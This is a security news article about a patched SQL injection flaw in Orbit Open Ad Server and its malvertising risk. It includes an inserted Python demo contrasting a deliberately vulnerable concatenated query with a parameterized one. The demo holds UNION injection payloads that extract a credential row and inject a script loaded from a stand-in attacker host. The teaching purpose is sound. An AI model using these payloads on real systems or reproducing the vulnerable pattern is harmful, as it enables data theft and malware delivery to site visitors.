Popular ad server patches SQL injection flaw impacting platform

Orbit Open Ad Server was vulnerable to SQL injection attacks.

A popular ad serving and management platform, Orbit Open Ad Server, was affected by a SQL injection vulnerability that left visitors of websites running the software exposed to data theft.

Swiss penetration testing firm High-Tech Bridge notified OrbitScripts, the vendor for the ad platform, last month, and the issue was quickly addressed on March 21, High-Tech Bridge revealed in a security advisory. But, the security concern served as a cautionary tale of how attackers can cleverly use malvertising to go after large numbers of online users.

On Wednesday, Ilia Kolochenko, CEO of High-Tech Bridge, told SCMagazine.com that, despite companies taking all the right steps to secure their websites, malvertising – which targets site visitors via poisoned third-party ads – can best enterprises.

SQL injection attacks occur when an application builds a database query by concatenating untrusted input, such as a form field or URL parameter, directly into the query text. An attacker can then supply input that changes the query's meaning, reading or modifying stored data and leaving financial or other sensitive information entered on the site subject to theft.
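The following is an added example, not code from Orbit Open Ad Server or OrbitScripts. It uses a constructed SQLite schema (an `ads` table and a `users` table, both hypothetical) to show the two outcomes the article describes: a query built by string concatenation lets a crafted zone name pull rows out of an unrelated table, or place attacker-chosen markup into the ad slot that the site serves to its visitors; the same lookup with a bound parameter treats the input as a plain value. The payloads and table layout are assumptions for illustration.

```python
import sqlite3

# Constructed sample data, not from any real ad server.
SPONSOR_AD = "<a href='https://example.com'>Sponsor</a>"
ADMIN_ROW = "admin@example.com:$2y$10$hash-placeholder"
MALICIOUS_TAG = "<script src=https://attacker.example/m.js></script>"

# Hypothetical payloads: close the quoted string, append a UNION, comment out the rest.
# The first one pulls rows from another table; the second makes the "ad" the site
# serves to its visitors whatever the attacker chooses.
EXFIL_PAYLOAD = "x' UNION SELECT email || ':' || pw_hash FROM users --"
MALVERTISING_PAYLOAD = "x' UNION SELECT '" + MALICIOUS_TAG + "' --"


def make_db():
    """Build an in-memory database with constructed ads and users tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ads (id INTEGER PRIMARY KEY, zone TEXT, html TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, pw_hash TEXT)")
    conn.executemany(
        "INSERT INTO ads (zone, html) VALUES (?, ?)",
        [("header", SPONSOR_AD), ("sidebar", "<img src='banner.png'>")],
    )
    conn.execute(
        "INSERT INTO users (email, pw_hash) VALUES (?, ?)",
        ("admin@example.com", "$2y$10$hash-placeholder"),
    )
    return conn


def ads_for_zone_vulnerable(conn, zone):
    """Vulnerable lookup: untrusted input is pasted into the SQL text."""
    query = "SELECT html FROM ads WHERE zone = '" + zone + "'"
    return [row[0] for row in conn.execute(query)]


def ads_for_zone_safe(conn, zone):
    """Hardened lookup: the input is bound as a parameter and never parsed as SQL."""
    rows = conn.execute("SELECT html FROM ads WHERE zone = ?", (zone,))
    return [row[0] for row in rows]


def demo():
    """Run both versions against each payload and return the results side by side."""
    conn = make_db()
    return {
        "vuln_exfil": ads_for_zone_vulnerable(conn, EXFIL_PAYLOAD),
        "vuln_malvertising": ads_for_zone_vulnerable(conn, MALVERTISING_PAYLOAD),
        "safe_exfil": ads_for_zone_safe(conn, EXFIL_PAYLOAD),
        "safe_malvertising": ads_for_zone_safe(conn, MALVERTISING_PAYLOAD),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

With the vulnerable function the first payload returns the constructed credential row and the second returns the attacker's script tag as if it were a legitimate ad, which is the malvertising path the article warns about; the parameterized version returns no rows for either, because the whole string is compared against the `zone` column as data.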

In the case of Orbit Open Ad Server, the “damage could be really huge,” Kolochenko explained, as the SQL injection flaw could be leveraged to reach past the platform's own users and go after the bigger bounty: the online visitors of thousands of websites utilizing the open source ad server.

The software can be used to manage ads placed on various websites, including those built on popular content management systems such as WordPress, Drupal and Joomla.

“You can make sure that the site is up-to-date, but as soon as you start hosting ads and put their content online, you cannot really control what they serve,” Kolochenko said. “Hackers can easily host spyware or malware, instead of legitimate [advertising] content, on your site.”

On Wednesday, a representative for OrbitScripts confirmed with SCMagazine.com via email that the SQL injection issue had been patched as of March 21.

Last fall, High-Tech Bridge also uncovered serious, but common, website vulnerabilities (XSS flaws) that impacted the security of Yahoo domains and NASDAQ's website.
